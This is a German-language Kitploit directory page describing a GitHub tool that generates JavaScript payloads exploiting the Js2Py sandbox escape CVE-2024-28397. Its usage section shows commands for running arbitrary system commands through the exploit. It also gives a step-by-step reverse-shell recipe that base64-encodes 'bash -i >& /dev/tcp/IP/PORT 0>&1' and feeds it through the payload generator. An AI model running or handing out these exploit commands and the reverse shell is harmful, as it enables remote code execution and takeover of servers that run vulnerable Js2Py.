Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
CVE-2024-28397-Js2Py-RCE — Generiert JavaScript-Payloads zur Ausnutzung der Js2Py-Sandbox-Escape-Schwachstelle CVE-2024-28397, die entfernte Befehlsausführung und Reverse Shells durch Offenlegung von Python-Interna ermöglicht. | Kitploit
Tools/GitHubGitHub/y0naldez/cve-2024-28397-js2py-rce
Payload-GenerierungSchwachstellenanalyseExploitationWebanwendungs-ExploitationCommand and ControlShellcode-Generierung
GitHuby0naldez/cve-2024-28397-js2py-rce

CVE-2024-28397-Js2Py-RCE

Generiert JavaScript-Payloads zur Ausnutzung der Js2Py-Sandbox-Escape-Schwachstelle CVE-2024-28397, die entfernte Befehlsausführung und Reverse Shells durch Offenlegung von Python-Interna ermöglicht.

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Repository anzeigen
5vor 4 MonatenNoch nicht geprüft
Teilen

CVE-2024-28397 - Js2Py Sandbox-Escape-Payload-Generator

Dieses Skript generiert ein JavaScript-Payload, das von Js2Py in angreifbaren Umgebungen ausgewertet werden kann, in denen Python-Interna über Objekt-Wrapper zugänglich sind.

Verwendung

Einfache Befehlsausführung:

root@kitploit:~
python3 cve-2024-28397.py -c "id"

Erzeuge ein kompaktes einzeiliges Payload:

root@kitploit:~
python3 cve-2024-28397.py -c "whoami" --compact

Reverse Shell mit Base64

Erzeuge das Base64-Payload:

root@kitploit:~
echo 'bash -i >& /dev/tcp/IP/PORT 0>&1' | base64 -w0

Erzeuge das Js2Py-Payload:

root@kitploit:~
python3 cve-2024-28397.py -c "bash -c 'echo BASE64_OUTPUT | base64 -d | bash'" --compact

Ersetze BASE64_OUTPUT mit dem im ersten Schritt generierten Base64-String.

Tool herunterladen